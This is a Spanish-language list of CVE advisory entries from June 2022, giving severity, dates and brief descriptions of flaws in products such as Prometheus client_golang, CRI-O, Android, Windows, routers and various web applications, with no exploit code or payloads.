    client_golang es la biblioteca de instrumentación para aplicaciones Go en Prometheus, y el paquete promhttp en client_golang proporciona herramientas en torno a los servidores y clientes HTTP. En client_golang versiones anteriores a 1.11.1, el servidor HTTP es susceptible de una Denegación de Servicio mediante una cardinalidad no limitada, y un potencial agotamiento de la memoria, cuando es manejado peticiones con métodos HTTP no estándar. Para ser afectado, un software instrumentado debe usar cualquiera de los middleware "promhttp.InstrumentHandler*" excepto "RequestsInFlight"; no filtrar ningún método específico (por ejemplo GET) antes del middleware; pasar la métrica con el nombre de la etiqueta "method" a nuestro middleware; y no presentar ningún firewall/LB/proxy que filtre las peticiones con "method" desconocido. client_golang versión 1.11.1 contiene un parche para este problema. Se presentan varias medidas de mitigación disponibles, incluyendo la eliminación del nombre de la etiqueta "method" del contador/calibre usado en el InstrumentHandler; la deshabilitación de los manejadores promhttp afectados; la adición de un middleware personalizado antes del manejador promhttp que sanee el método de petición dado por Go http.Request; y el uso de un proxy inverso o un firewall de aplicaciones web, configurado para permitir sólo un conjunto limitado de métodos
  • CVE-2022-29564
    Severidad: MEDIA
    Fecha de publicación: 07/06/2022
    Fecha de última actualización: 08/08/2023
    Jamf Private Access versiones anteriores a 16-05-2022, presenta un Control de Acceso Incorrecto, en el que un usuario no autorizado puede alcanzar un sistema en la infraestructura interna, también se conoce como WND-44801
  • CVE-2022-1708
    Severidad: ALTA
    Fecha de publicación: 07/06/2022
    Fecha de última actualización: 24/07/2023
    Se ha encontrado una vulnerabilidad en CRI-O que causa el agotamiento de la memoria o del espacio en disco en el nodo para cualquiera que tenga acceso a la API de Kube. La petición ExecSync ejecuta comandos en un contenedor y registra la salida del comando. Esta salida es leída por CRI-O después de la ejecución del comando, y es leída de manera que el archivo completo correspondiente a la salida del comando es leído. Así, si la salida del comando es grande es posible agotar la memoria o el espacio en disco del nodo cuando CRI-O lee la salida del comando. La mayor amenaza de esta vulnerabilidad es la disponibilidad del sistema
  • CVE-2022-30586
    Severidad: MEDIA
    Fecha de publicación: 06/06/2022
    Fecha de última actualización: 08/08/2023
    Gradle Enterprise versiones hasta 2022.2.2, presenta un Control de Acceso Incorrecto que conlleva a una ejecución de código
  • CVE-2022-30587
    Severidad: MEDIA
    Fecha de publicación: 06/06/2022
    Fecha de última actualización: 08/08/2023
    Gradle Enterprise versiones hasta 2022.2.2 , presenta un Control de Acceso Incorrecto que conlleva a una divulgación de información
  • CVE-2022-31025
    Severidad: MEDIA
    Fecha de publicación: 07/06/2022
    Fecha de última actualización: 21/07/2023
    Discourse es una plataforma de código abierto para el debate comunitario. En versiones anteriores a 2.8.4 en la rama "stable" y de la 2.9.0beta5 en las ramas "beta" y "tests-passed", invitar a usuarios en sitios que usan el inicio de sesión único podía omitir la comprobación "must_approve_users" y las invitaciones del personal siempre son aprobadas automáticamente. El problema está parcheado en la versión 2.8.4 de Discourse en la rama "stable" y en versión "2.9.0.beta5" en las ramas "beta" y "tests-passed". Como mitigación, deshabilite las invitaciones o aumente "min_trust_level_to_allow_invite" para reducir la superficie de ataque a los usuarios de mayor confianza
  • CVE-2022-27779
    Severidad: MEDIA
    Fecha de publicación: 02/06/2022
    Fecha de última actualización: 18/07/2023
    libcurl permite erróneamente que se establezcan cookies para Dominios de Alto Nivel (TLDs) si el nombre de host es proporcionado con un punto al final. curl puede recibir y enviar cookies. "cookie engine" de curl puede construirse con o sin conocimiento de la [Lista de Sufijos Públicos] (https://publicsuffix.org/). Si no es proporcionado soporte de PSL, se presenta una comprobación más rudimentaria para al menos evitar que sean establecidas cookies en los TLD. Esta comprobación no funcionaba si el nombre del host en la URL usaba un punto al final, lo que podía permitir que sitios arbitrarios establecieran cookies que sean enviadas a un sitio o dominio diferente y no relacionado
  • CVE-2022-31047
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 24/07/2023
    TYPO3 es un sistema de administración de contenidos web de código abierto. En versiones anteriores a 7.6.57 ELTS, 8.7.47 ELTS, 9.5.34 ELTS, 10.4.29 y 11.5.11, las credenciales o claves internas del sistema (por ejemplo, las credenciales de la base de datos) podían registrarse como texto plano en los manejadores de excepciones, cuando es registrado el seguimiento completo de la pila de excepciones. TYPO3 versiones 7.6.57 ELTS, 8.7.47 ELTS, 9.5.34 ELTS, 10.4.29, 11.5.11 contienen una corrección del problema
  • CVE-2022-31595
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 24/07/2023
    SAP Financial Consolidation - versión 1010,... no lleva a cabo las comprobaciones de autorización necesarias para un usuario autenticado, resultando en una escalada de privilegios
  • CVE-2022-32559
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Couchbase Server versiones anteriores a 7.0.4. Las peticiones HTTP aleatorias conllevan a una filtración de métricas
  • CVE-2022-32557
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Couchbase Server versiones anteriores a 7.0.4. El servicio de índices no aplica la autenticación para los servidores TCP/TLS
  • CVE-2022-32328
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Fast Food Ordering System versión v1.0, es vulnerable a la eliminación de cualquier archivo por medio del archivo /ffos/classes/Master.php?f=delete_img
  • CVE-2022-31847
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en el archivo /cgi-bin/ExportAllSettings.sh de WAVLINK WN579 X3 versión M79X3.V5030.180719 permite a atacantes obtener información confidencial del router por medio de una petición POST diseñada
  • CVE-2022-31311
    Severidad: ALTA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Un problema en el archivo adm.cgi de WAVLINK AERIAL X 1200M versión M79X3.V5030.180719, permite a atacantes ejecutar comandos arbitrarios por medio de una petición POST diseñada
  • CVE-2022-31309
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en el archivo live_check.shtml de WAVLINK AERIAL X 1200M versión M79X3.V5030.180719, permite a atacantes obtener información confidencial del router por medio de la ejecución de la función exec cmd
  • CVE-2022-31308
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en el archivo live_mfg.shtml de WAVLINK AERIAL X 1200M versión M79X3.V5030.191012, permite a atacantes obtener información confidencial del router por medio de la ejecución de la función exec cmd
  • CVE-2021-40660
    Severidad: MEDIA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Delight Nashorn Sandbox 0.2.0. Se presenta una vulnerabilidad ReDoS que puede ser explotada para lanzar un ataque de denegación de servicio (DoS)
  • CVE-2022-20137
    Severidad: MEDIA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función onCreateContextMenu del archivo NetworkProviderSettings.java, se presenta una posible forma de que los usuarios no propietarios cambien la configuración del WiFi debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución User necesarios. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12 Android-12L, ID de Android: A-206986392
  • CVE-2022-20133
    Severidad: ALTA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función setDiscoverableTimeout del archivo AdapterService.java, se presenta una posible omisión de la interacción con el usuario debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-12L, ID de Android: A-206807679
  • CVE-2022-20131
    Severidad: ALTA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función nci_proc_rf_management_ntf del archivo nci_hrcv.cc, se presenta una posible lectura fuera de límites debido a una falta de comprobación de límites. Esto podría conllevar a una divulgación remota de información sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-12L, ID de Android: A-221856662
  • CVE-2022-20130
    Severidad: ALTA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función transportDec_OutOfBandConfig del archivo tpdec_lib.cpp, se presenta una posible escritura fuera de límites debido a un desbordamiento del búfer de la pila. Esto podría conllevar a una ejecución de código remota sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-12L, ID de Android: A-224314979
  • CVE-2022-20129
    Severidad: MEDIA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función registerPhoneAccount del archivo PhoneAccountRegistrar.java, es posible impedir que el usuario seleccione una cuenta de teléfono debido a una comprobación de entrada inapropiada. Esto podría conllevar a una denegación de servicio local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-12L, ID de Android: A-217934478
  • CVE-2022-20126
    Severidad: MEDIA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función setScanMode del archivo AdapterService.java, se presenta una posible forma de habilitar el modo de detección de Bluetooth sin la interacción del usuario debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución User necesarios. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-12L, ID de Android: A-203431023
  • CVE-2022-30877
    Severidad: ALTA
    Fecha de publicación: 08/06/2022
    Fecha de última actualización: 08/08/2023
    keep for python, distribuido en PyPI, incluía una puerta trasera de ejecución de código insertada por un tercero. La versión actual, sin este backdoor, es la versión 1.2
  • CVE-2022-20206
    Severidad: BAJA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función setPackageOrComponentEnabled del archivo NotificationManagerService.java, falta una comprobación de permisos. Esto podría conllevar a una divulgación de información local sobre los oyentes de notificaciones habilitados con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12L, ID de Android: A-220737634
  • CVE-2022-20204
    Severidad: MEDIA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función registerRemoteBugreportReceivers del archivo DevicePolicyManagerService.java, se presenta la posibilidad de que sean informados informes de errores falsificados debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12L, ID de Android: A-171495100
  • CVE-2022-20201
    Severidad: MEDIA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función getAppSize del archivo InstalldNativeService.cpp, se presenta una posible lectura fuera de límites debido a una falta de comprobación de límites. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12L, ID de Android: A-220733817
  • CVE-2022-20200
    Severidad: BAJA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función updateApState del archivo SoftApManager.java, se presenta un posible filtrado del estado del punto de acceso debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación Producto: Android, Versiones: Android-12L, ID de Android: A-212695058
  • CVE-2022-20182
    Severidad: BAJA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función handle_ramdump del archivo pixel_loader.c, se presenta una posible forma de crear un ramdump de memoria no segura debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android kernel, ID de Android: A-222348453, Referencias: N/A
  • CVE-2022-20176
    Severidad: BAJA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función auth_store del archivo sjtag-driver.c, se presenta una posible lectura de memoria no inicializada debido a una falta de comprobación de límites. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android kernel, ID de Android: A-197787879, Referencias: N/A
  • CVE-2022-20172
    Severidad: BAJA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función onbind del archivo ShannonRcsService.java, se presenta un posible acceso a datos protegidos debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es necesaria la interacción del usuario para su explotación. Producto: Android, Versiones: Android kernel, ID de Android: A-206987222, Referencias: N/A
  • CVE-2022-20153
    Severidad: ALTA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función rcu_cblist_dequeue del archivo rcu_segcblist.c, se presenta un posible uso de memoria previamente liberada debido a un bloqueo inapropiado. Esto podría conllevar a una escalada local de privilegios en el kernel con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android kernel, ID de Android: A-222091980, Referencias: Kernel Ascendente
  • CVE-2022-20143
    Severidad: MEDIA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función addAutomaticZenRule del archivo ZenModeHelper.java, se presenta una posible denegación de servicio permanente debido al agotamiento de recursos. Esto podría conllevar a una denegación de servicio local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-12L, ID de Android: A-220735360
  • CVE-2022-20138
    Severidad: ALTA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En la función ACTION_MANAGED_PROFILE_PROVISIONED del archivo DevicePolicyManagerService.java, es posible a una aplicación no privilegiada enviar la intención MANAGED_PROFILE_PROVISIONED debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-12L, ID de Android: A-210469972
  • CVE-2022-29255
    Severidad: MEDIA
    Fecha de publicación: 09/06/2022
    Fecha de última actualización: 02/08/2023
    Vyper es un Lenguaje de Contratos Inteligentes de Python para la máquina virtual de Ethereum. En versiones anteriores a 0.3.4, cuando es llamado a un contrato externo sin valor de retorno, la dirección del contrato (incluyendo los efectos secundarios) podía ser evaluada dos veces. Esto podía resultar en respuestas incorrectas para los contratos. Este problema ha sido abordado en versión 0.3.4
  • CVE-2021-25263
    Severidad: MEDIA
    Fecha de publicación: 17/08/2021
    Fecha de última actualización: 08/08/2023
    La vulnerabilidad de privilegios locales en Yandex Browser para Windows anterior a la versión 21.9.0.390 permite a un atacante local, con pocos privilegios, ejecutar código arbitrario con los privilegios del SISTEMA a través de la manipulación de archivos en el directorio con permisos inseguros durante el proceso de actualización de Yandex Browser
  • CVE-2022-30164
    Severidad: MEDIA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Omisión de Funciones de Seguridad de Kerberos AppContainer
  • CVE-2022-30155
    Severidad: ALTA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Denegación de Servicio en Windows Kernel
  • CVE-2022-30154
    Severidad: BAJA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Microsoft File Server Shadow Copy Agent Service (RVSS)
  • CVE-2022-30152
    Severidad: MEDIA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Denegación de Servicio en Windows Network Address Translation (NAT)
  • CVE-2022-30151
    Severidad: MEDIA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Ancillary Function Driver
  • CVE-2022-30150
    Severidad: MEDIA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios de Windows Defender Remote Credential Guard
  • CVE-2022-30145
    Severidad: MEDIA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Ejecución de Código Remota en Windows Encrypting File System (EFS)
  • CVE-2022-30141
    Severidad: ALTA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Ejecución de Código Remota en Windows Lightweight Directory Access Protocol (LDAP). Este ID de CVE es diferente de CVE-2022-30139, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161
  • CVE-2022-20203
    Severidad: MEDIA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    En varias ubicaciones de la biblioteca nanopb, se presenta una posible forma de corromper la memoria cuando son descodificados archivos protobuf no confiables. Esto podría conllevar a una escalada local de privilegios, sin ser necesarios privilegios de ejecución adicionales No es requerida una interacción del usuario para una explotación
  • CVE-2022-28749
    Severidad: MEDIA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    Zooms On-Premise Meeting Connector MMR versiones anteriores a 4.8.113.20220526, no comprueba correctamente los permisos de los asistentes a las reuniones de Zoom. Como resultado, un actor de la amenaza en la sala de espera de Zooms puede unirse a la reunión sin el consentimiento del anfitrión
  • CVE-2022-28226
    Severidad: ALTA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de privilegio local en Yandex Browser para Windows versiones anteriores a 22.3.3.801, permite a un atacante local, con pocos privilegios, ejecutar código arbitrario con los privilegios SYSTEM mediante la manipulación de archivos temporales en el directorio con permisos no seguros durante el proceso de actualización de Yandex Browser
  • CVE-2021-41418
    Severidad: ALTA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 08/08/2023
    AriaNg versiones v0.1.0~v1.2.2, está afectado por una vulnerabilidad de control de acceso incorrecto al no autenticar los derechos de acceso de los visitantes
  • CVE-2022-31219
    Severidad: ALTA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 24/07/2023
    Unas vulnerabilidades en el Drive Composer permiten a un atacante con pocos privilegios crear y escribir en un archivo en cualquier lugar del sistema de archivos como SYSTEM con contenido arbitrario siempre que el archivo no exista ya. El archivo de instalación de Drive Composer permite a un usuario con pocos privilegios ejecutar una operación de "reparación" en el producto
  • CVE-2022-31218
    Severidad: ALTA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 24/07/2023
    Unas vulnerabilidades en Drive Composer permiten a un atacante con pocos privilegios crear y escribir en un archivo en cualquier parte del sistema de archivos como SYSTEM con contenido arbitrario siempre que el archivo no exista ya. El archivo de instalación de Drive Composer permite a un usuario con pocos privilegios ejecutar una operación de "reparación" en el producto
  • CVE-2022-31217
    Severidad: ALTA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 24/07/2023
    Unas vulnerabilidades en Drive Composer permiten a un atacante con pocos privilegios crear y escribir en un archivo en cualquier parte del sistema de archivos como SYSTEM con contenido arbitrario siempre que el archivo no exista ya. El archivo de instalación de Drive Composer permite a un usuario con pocos privilegios ejecutar una operación de "reparación" en el producto
  • CVE-2022-31216
    Severidad: ALTA
    Fecha de publicación: 15/06/2022
    Fecha de última actualización: 24/07/2023
    Unas vulnerabilidades en Drive Composer permiten a un atacante con pocos privilegios crear y escribir en un archivo en cualquier parte del sistema de archivos como SYSTEM con contenido arbitrario siempre que el archivo no exista ya. El archivo de instalación de Drive Composer permite a un usuario con pocos privilegios ejecutar una operación de "reparación" en el producto
  • CVE-2022-26691
    Severidad: ALTA
    Fecha de publicación: 26/05/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de lógica con una administración de estados mejorada. Este problema es corregido en Security Update 2022-003 Catalina, macOS Monterey versión 12.3, macOS Big Sur versión 11.6.5. Una aplicación puede ser capaz de alcanzar altos privilegios
  • CVE-2022-22953
    Severidad: MEDIA
    Fecha de publicación: 16/06/2022
    Fecha de última actualización: 08/08/2023
    La actualización de VMware HCX aborda una vulnerabilidad de divulgación de información. Un actor malicioso con acceso de usuario de red al dispositivo VMware HCX podría conseguir acceso a información confidencial
  • CVE-2022-31849
    Severidad: MEDIA
    Fecha de publicación: 16/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que MERCURY MIPC451-4 versión 1.0.22 Build 220105 Rel.55642n, contiene una vulnerabilidad de ejecución de código remota (RCE) que puede aprovecharse por medio de una petición POST diseñada
  • CVE-2022-30023
    Severidad: ALTA
    Fecha de publicación: 16/06/2022
    Fecha de última actualización: 08/08/2023
    Tenda ONT GPON AC1200 Dual band WiFi HG9 versión v1.0.1, es vulnerable a una inyección de comandos por medio de la función Ping
  • CVE-2021-41421
    Severidad: BAJA
    Fecha de publicación: 16/06/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de inyección de código PHP en MaianAffiliate versión v.1.0, permite a un atacante autenticado conseguir RCE mediante el panel de administración de MaianAffiliate
  • CVE-2022-27192
    Severidad: MEDIA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 08/08/2023
    El módulo de informes del sistema de gestión documental DVS Avilys de Aseco Lietuva anterior a la versión 3.5.58 permite la descarga de archivos no autorizados. Un atacante no autenticado puede hacerse pasar por un administrador leyendo archivos administrativos
  • CVE-2022-31464
    Severidad: ALTA
    Fecha de publicación: 16/06/2022
    Fecha de última actualización: 08/08/2023
    Una configuración no segura de los permisos en Adaware Protect versión v1.2.439.4251, permite a atacantes escalar privilegios por medio del cambio de la ruta binaria del servicio
  • CVE-2022-24562
    Severidad: ALTA
    Fecha de publicación: 16/06/2022
    Fecha de última actualización: 08/08/2023
    En IOBit IOTransfer versión 4.3.1.1561, un atacante no autenticado puede enviar peticiones GET y POST a Airserv y conseguir acceso arbitrario de lectura/escritura a todo el sistema de archivos (con privilegios de administrador) en el endpoint de la víctima, lo que puede resultar en el robo de datos y una ejecución de código remota
  • CVE-2022-23437
    Severidad: ALTA
    Fecha de publicación: 24/01/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad en el analizador XML de Apache Xerces Java (XercesJ) cuando maneja cargas útiles de documentos XML especialmente diseñados. Esto causa que el analizador XML de XercesJ espere en un bucle infinito, lo que a veces puede consumir recursos del sistema durante un tiempo prolongado. Esta vulnerabilidad está presente en XercesJ versión 2.12.1, y en versiones anteriores
  • CVE-2022-33755
    Severidad: MEDIA
    Fecha de publicación: 16/06/2022
    Fecha de última actualización: 08/08/2023
    CA Automic Automation versiones 12.2 y 12.3, contienen una vulnerabilidad de manejo de entradas no segura en el agente de Automic que podría permitir a un atacante remoto enumerar usuarios
  • CVE-2022-33753
    Severidad: MEDIA
    Fecha de publicación: 16/06/2022
    Fecha de última actualización: 08/08/2023
    CA Automic Automation versiones 12.2 y 12.3, contienen una vulnerabilidad de creación y manejo de archivos no segura en el agente de Automic que podría permitir a un usuario elevar potencialmente sus privilegios
  • CVE-2022-33751
    Severidad: MEDIA
    Fecha de publicación: 16/06/2022
    Fecha de última actualización: 08/08/2023
    CA Automic Automation versiones 12.2 y 12.3, contienen una vulnerabilidad de manejo de memoria no segura en el agente de Automic que podría permitir a un atacante remoto acceder potencialmente a datos confidenciales
  • CVE-2022-31769
    Severidad: MEDIA
    Fecha de publicación: 10/06/2022
    Fecha de última actualización: 08/08/2023
    IBM Spectrum Copy Data Management versiones 2.2.0.0 hasta 2.2.15.0, podría permitir a un atacante remoto visualizar la información de configuración del producto almacenada en PostgreSQL, que podría usarse en otros ataques contra el sistema. IBM X-Force ID: 228219
  • CVE-2021-36710
    Severidad: ALTA
    Fecha de publicación: 08/06/2022
    Fecha de última actualización: 08/08/2023
    ToaruOS versión 1.99.2 está afectado por un control de acceso incorrecto por medio del kernel. Una administración inapropiada de la MMU y el hecho de tener una dirección GDT baja permite que sea mapeado en userland. Una puerta de llamada puede entonces ser escrita para escalar a CPL 0
  • CVE-2022-29013
    Severidad: ALTA
    Fecha de publicación: 08/06/2022
    Fecha de última actualización: 08/08/2023
    Una inyección de comandos en el parámetro command de Razer Sila Gaming Router versión v2.0.441_api-2.0.418, permite a atacantes ejecutar comandos arbitrarios por medio de una petición POST diseñada
  • CVE-2022-31496
    Severidad: ALTA
    Fecha de publicación: 08/06/2022
    Fecha de última actualización: 08/08/2023
    LibreHealth EHR Base versión 2.0.0, permite un acceso incorrecto en el archivo interfaz/super/manage_site_files.php
  • CVE-2022-22426
    Severidad: BAJA
    Fecha de publicación: 10/06/2022
    Fecha de última actualización: 08/08/2023
    IBM Spectrum Copy Data Management Admin versiones 2.2.0.0 hasta 2.2.15.0, podría permitir a un atacante local omitir las restricciones de autenticación, causadas por la falta de una administración de sesiones apropiada. Un atacante podría aprovechar esta vulnerabilidad para omitir la autenticación y conseguir acceso no autorizado al catálogo de Spectrum Copy Data Management que contiene metadatos. IBM X-Force ID: 223718
  • CVE-2022-30780
    Severidad: MEDIA
    Fecha de publicación: 11/06/2022
    Fecha de última actualización: 08/08/2023
    Lighttpd versiones 1.4.56 hasta 1.4.58, permite a un atacante remoto causar una denegación de servicio (consumo de CPU por conexiones atascadas) porque la función connection_read_header_more en el archivo connections.c presenta una errata que interrumpe el uso de múltiples operaciones de lectura en encabezados grandes
  • CVE-2021-41738
    Severidad: MEDIA
    Fecha de publicación: 11/06/2022
    Fecha de última actualización: 08/08/2023
    ZeroShell versión 3.9.5, presenta una vulnerabilidad de inyección de comandos en el parámetro IP /cgi-bin/kerbynet, que puede permitir a un atacante autenticado ejecutar comandos del sistema
  • CVE-2022-24376
    Severidad: ALTA
    Fecha de publicación: 10/06/2022
    Fecha de última actualización: 08/08/2023
    Todas las versiones del paquete git-promise son vulnerables a una inyección de comandos debido a una corrección inapropiada de una [vulnerabilidad] anterior (https://security.snyk.io/vuln/SNYK-JS-GITPROMISE-567476) en este paquete. **Nota:** Tenga en cuenta que la vulnerabilidad no será corregida. Ha sido actualizado el archivo README con una advertencia relativa a este problema
  • CVE-2022-30607
    Severidad: MEDIA
    Fecha de publicación: 17/06/2022
    Fecha de última actualización: 08/08/2023
    IBM Robotic Process Automation versiones 20.10.0, 20.12.5, 21.0.0, 21.0.1 y 21.0.2, contiene una vulnerabilidad que podría permitir a un usuario obtener información confidencial debido a una información correctamente enmascarada en la interfaz de usuario del centro de control. IBM X-Force ID: 227294
  • CVE-2022-22485
    Severidad: ALTA
    Fecha de publicación: 17/06/2022
    Fecha de última actualización: 08/08/2023
    En algunos casos, un intento fallido de iniciar sesión en IBM Spectrum Protect Operations Center versiones 8.1.0.000 hasta 8.1.14.000, no causa que el recuento de inicios de sesión no válidos del administrador sea incrementado en el servidor de IBM Spectrum Protect. Un atacante podría aprovechar esta vulnerabilidad usando técnicas de fuerza bruta para conseguir acceso administrativo no autorizado al servidor IBM Spectrum Protect. IBM X-Force ID: 226325
  • CVE-2022-31876
    Severidad: MEDIA
    Fecha de publicación: 17/06/2022
    Fecha de última actualización: 08/08/2023
    El router netgear wnap320 versión WNAP320_V2.0.3_firmware es vulnerable a un Control de Acceso Incorrecto por medio del archivo /recreate.php, que puede filtrar las cookies de todos los usuarios
  • CVE-2022-25856
    Severidad: MEDIA
    Fecha de publicación: 17/06/2022
    Fecha de última actualización: 08/08/2023
    El paquete github.com/argoproj/argo-events/sensors/artifacts versiones anteriores a 1.7.1, es vulnerable a un Salto de Directorio en la API (g *GitArtifactReader).Read() en git.go. Esto podría permitir la lectura arbitraria de archivos si al GitArtifactReader le es proporcionada una ruta que contenga un enlace simbólico o un nombre de directorio implícito como ...
  • CVE-2021-46814
    Severidad: MEDIA
    Fecha de publicación: 13/06/2022
    Fecha de última actualización: 08/08/2023
    video framework presenta una vulnerabilidad de lectura/escritura de memoria fuera de límites. Una explotación con éxito de esta vulnerabilidad puede afectar a la disponibilidad del sistema
  • CVE-2022-31446
    Severidad: ALTA
    Fecha de publicación: 14/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el router Tenda AC18 versiones V15.03.05.19 y V15.03.05.05, contiene una vulnerabilidad de ejecución de código remota (RCE) por medio del parámetro Mac en ip/goform/WriteFacMac
  • CVE-2021-40903
    Severidad: ALTA
    Fecha de publicación: 17/06/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad en Antminer Monitor versión 0.50.0, debido a una puerta trasera o a una configuración errónea dentro de un archivo de configuración en el servidor Flask. El archivo de configuración presenta una cadena secreta predefinida, que sería generada aleatoriamente, sin embargo es estática
  • CVE-2021-46823
    Severidad: MEDIA
    Fecha de publicación: 18/06/2022
    Fecha de última actualización: 08/08/2023
    python-ldap versiones anteriores a 3.4.0, es vulnerable a una denegación de servicio cuando es usado ldap.schema para definiciones de esquemas que no son confiables, debido a un fallo de denegación de servicio de expresiones regulares (ReDoS) en el analizador de esquemas LDAP. Al enviar una entrada regex diseñada, un atacante remoto autenticado podría explotar esta vulnerabilidad para causar una condición de denegación de servicio
  • CVE-2022-24065
    Severidad: ALTA
    Fecha de publicación: 08/06/2022
    Fecha de última actualización: 08/08/2023
    El paquete cookiecutter versiones anteriores a 2.1.1, es vulnerable a la inyección de comandos por medio de la inyección de argumentos hg. Cuando es llamada a la función cookiecutter desde código Python con el parámetro checkout, es pasado al comando hg checkout de forma que pueden establecerse flags adicionales. Las flags adicionales pueden ser usadas para llevar a cabo una inyección de comandos
  • CVE-2022-34006
    Severidad: ALTA
    Fecha de publicación: 19/06/2022
    Fecha de última actualización: 08/08/2023
